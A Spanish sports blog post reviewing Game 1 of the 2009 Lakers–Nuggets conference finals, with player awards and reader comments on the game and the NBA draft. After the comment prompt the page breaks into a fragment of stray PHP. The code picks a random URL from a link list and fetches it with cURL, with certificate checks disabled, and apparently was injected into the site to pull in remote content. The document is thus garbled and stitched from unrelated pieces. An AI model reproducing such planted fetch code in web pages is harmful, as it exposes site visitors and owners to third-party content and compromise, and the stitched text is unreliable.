Playoffs (19/05/2009): Duelo al amanecer

20 de May de 2009 por TheDeerHunter

Anoche disfrutamos de un partidazo en el Staples para abrir boca con las finales de Conferencia.

Empezaron fuertes los Nuggets, con el ánimo de emular a los Rockets en el primer partido de la anterior serie. Carmelo estuvo demoledor, y qué gran jugador es cuando se le ve sereno. 16 puntos suyos permitieron a Denver alcanzar una ventaja máxima de 13 mientras los Lakers no encontraban soluciones ante la dupla Melo-Martin. El caso es que a los Nuggets se les contagió ese defecto de los amarillos de no rematar el partido cuando lo tienen a punto y cometieron algunos errores de más en el momento clave, sobre todo desde la línea de tiros libres. Fiebre amarilla le llaman a esto.

Como ya barruntábamos ayer, a poco que los secundarios produzcan algo el equipo local gana mucho. Si Fisher, Ariza y Bynum no lo hicieron mal del todo, la irrupción de Farmar, Vujacic, Walton y Odom fue puntualmente demoledora. La gran ventaja que podía haber sido irrecuperable quedaba neutralizada al final de la primera parte con un buzzer-beater de Fisher. Por su parte, JR Smith o Anthony Carter no estuvieron como otras noches.

En la segunda parte el partido continuó en un intercambio de puntos que, en esta ocasión, no terminaba de beneficiar a los Lakers. Denver estaba anotando con más facilidad, pero los Lakers dominaban los rebotes (que no la anotación interior) y disfrutaban de muchos más lanzamientos. Si en otras ocasiones los Nuggets habían desarbolado a su rival desde más allá de la línea de tres, ahora sufrían el bombardeo exterior de los angelinos.

Pero en el último cuarto surgió la leyenda. Kobe Bryant. El mismo día que su mentor, Jerry West, opinó que LeBron le ha superado como jugador, Bryant demostró lo que le diferencia.  Cogió las riendas del equipo (¡oh, sorpresa!) y las anotó de todos los colores y sabores, con una efectividad casi diabólica. 18 puntos y Melo viéndolas venir en el último cuarto. No le detuvo ni una nueva dislocación en el dedo anular de la mano derecha. La diferencia entre los grandes jugadores y los dioses. Sus tiros libres, un triple de Fisher y un oportuno robo de balón de Ariza sellaron la victoria para unos Lakers que vienen de menos a más, con tantos motivos para la preocupación como margen de mejora. Los Nuggets también lo tienen, pero el golpe moral de un partido que tuvieron en su mano puede ser significativo. Y ya se sabe: Phil Jackson jamás ha perdido una serie tras ganar el primer partido de la misma.

PREMIOS

MVP: Tratándose de Kobe, 40 puntos, 6 rebotes, 4 asistencias no son de por sí números de otro planeta. Como dijo Odom, “empiezas a acostumbrarte a la grandeza”. Pero lo que hizo en el último cuarto debería pasar directamente a la historia.

La Sorpresa: Hay quien daba a Derek Fisher por acabado. Anoche le plantó cara a Billups y acertó en lanzamientos decisivos. Sigue siendo pieza fundamental en este equipo aunque cada vez le cueste más estar bien todos los partidos. Mención a parte para la segunda unidad de los Lakers, que volvió por sus fueros. Estando bien deberían ser la mejor rotación de la liga, y decisivos.

La Decepción: 1 punto entre Dahntay Jones, Anthony Carter y Kleiza parece demasiado poco teniendo en cuenta los minutos de los que disfrutaron. De la segunda unidad depende gran parte del resultado de esta eliminatoria.

El mayor esfuerzo en vano: Melo estuvo apoteósico durante los tres primeros cuartos. Eso sí, en el último se vino bastante abajo. ¿Miedo?

RAZONES PARA TRASNOCHAR

Si el partido de anoche fue de la calidad y la intensidad que se merece una final de conferencia, el que se presenta esta madrugada seguro que no tendrá nada que envidiarle. Orlando y Cleveland se retan en casa de este último para dilucidar el campeón del Este. Y no será tan sólo un LeBron James contra Dwigh Howard. A la 1:30 hora española.

Comenta

9 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Vaya fiasco de loteria del draft……. hubiera preferido : 1. Memphis y 2. Oklahoma City.

    Por una parte, posiblemente Ricky vaya a Memphis, cuando lo perfecto sería que fuera elegido por Oklahoma City, para jugar junto con Westbrook, Durant y Green. Formarían una de las plantillas más prometedoras sin duda. Esperemos que Memphis elija a Thabeet y dejen esa posibilidad, aunque esto perjudicaría a Marc Gasol.

    La primera elección de Clippers también deja mal sabor de boca, ya que Griffin compartirá vestuario con Zach, Camby y Kaman. No me gusta para nada esta franquicia para el de Oklahoma, hubiera sido la repera caer en Memphis Grizzlies, para hacer pareja interior con Marc Gasol.

    Por otra parte a ver si Toronto Raptors es capaz de hacerse con los derechos de Tryeke Evans, el escolta de Memphis, para mí uno de los mejores jugadores de este año, y puede ser el jugador que lleva tiempo buscando la franquicia canadiense.

      Citar

  2. portu dice:
    #2

    Siendo un gran jugador, no parece q Griffin pueda cambiar radicalmente el curso de una franquicia, así q dada la plantilla de Clippers y la de Memphis, yo creo q Memphis debería intentar un trade ofreciendo el pick 2 y comerse algún contrato chungo más algún jugador a cambio del pick 1… un quinteto Conley-Mayo-Gay-Griffin-Gasol sonaría bastante bien… en este supuesto creo q Clippers podría mantener su juego interior actual y reforzar otras posiciones, quizás incluso llevarse a Ricky para q jubilase a Baron…

    Lo de Ricky se ha complicado, la realidad es q no todos los equipos van a apostar por él, pese a la buena prensa q tiene en USA.. podría caer incluso al puesto 4 o 5 fácilmente…; si Griffin es 1 claro, a Memphis no le interesa ahora malvender a Conley por quien ya apostaron claramente el año pasado, a Okl podría irles bien, pero les viene mejor Tabeet… aunque ojo, q ya la han cagado varias veces con los Sene y similares…, no sé, creo q debe haber trades.

      Citar

  3. Kantonyo dice:
    #3

    Yo creo que Ricky es imposible que baje del número 3, Oklahoma City nunca le dejaría escapar.

      Citar

  4. xapa_croack dice:
    #4

    Hombre normal esque clippers al pillar a griffin, y buscar traspaso por camby que acabaria contrato en el 2010 y todo el mundo espera tener hueco para ese año.

    A ricky le vendria ideal sacramento en el puesto 4, que no tendria casi competencia.

    Sobre el partido vaya faltica k pitan a brutus martin en un robo legal a cobe (entre esto) y los tiros libres fallados se escapo el partido.

      Citar

  5. TheDeerHunter dice:
    #5

    la jugada que mencionas es discutible… tanto como que el jugador ni la protesta

    no lo es tanto el triple que anota Billups pisando fuera un par de jugadas antes

      Citar

  6. MagicJohnson32 dice:
    #6

    Los Nuggets tuvieron el arbitraje que cualquier equipo visitante sueña en unos Playoffs.

    El partido se decantó por detalles, como suele pasar. El principal detalle fue que el señor del 24 jugaba de amarillo. Luego hubo otros detalles, como un par de acciones de Ariza tras una noche negra, el triple de Fisher (classic!) y las dudas que le entraron a los Nuggets al final. Llegados a cierto punto, has de tener las ideas muy claras, y los Nuggets dudaron.

    Eso sí, los Lakers van a necesitar mayor dureza, más agresividad sobre todo por parte de Pau, que ha de volver a ejercer de referencia interior.

    En fin, que ahora sí, ahora ¡¡ya han empezado los Playoffs!!

      Citar

  7. Angel dice:
    #7

    El partido de ayer fue bastante bueno por parte de los dos equipos. Sin embargo, creo que lo que va a decidir la eliminatoria es, por desgracia, el aspecto arbitral. Si los árbitros permiten repartir estopa como ayer permitieron, los Nuggets van a tener opciones, porque son durosy les va ese estilo de juego. Sin embargo, como los árbitros se pongan pitones, los Lakers tienen muchas más armas para desárbolar la defensa de los de Denver.

    Por cierto, Pau parecía que no había salido al parquet hasta que encadenó dos jugadas defensivas determinantes al final del partido, pero aun así, se casca un 14-13, que crack.

    En cuanto a Ricky, yo dudo mucho que salga en el número 2. Memphis, casi por obligación, ha de seguir apostando por Conley y sus 30 minutos por partido mínimo, ¿van a gastar una elección tan alta (por primera vez en los últimos años) en un base?, yo supongo que irán a por un jugador interior… . No veo tan descabellado que acabe en el número 1, ya que la temporada de Baron Davis ha sido nefasta e igual a los Clippers no les viene mal un cambio y sacar algo a cambio de Baron.

    En caso de que no salga en los dos primeros, el tercer puesto lo tiene seguro. Y Oklahoma, estamos todos de acuerdo, es un equipo donde encajaría a la perfección…

    Saludos desde la cueva!!!

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    De la cueva de neptuno manan las aguas que luego dan lugar al Manzanares??

    ¿Existe sobre cuando Odom mete un triple, los Lakers ganan?

    Bien titulado el artículo. Si hubiese empezado a las 4 o 4:30, se debería haber llamado el artículo “Duelo a la hora del almuerzo”

      Citar

  9. Angel dice:
    #9

    Para ARO: Es cierto, la mayoría de las aguas de la cueva van a para al Manzanares… que le vamos a hacer ;).

    Un saludo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>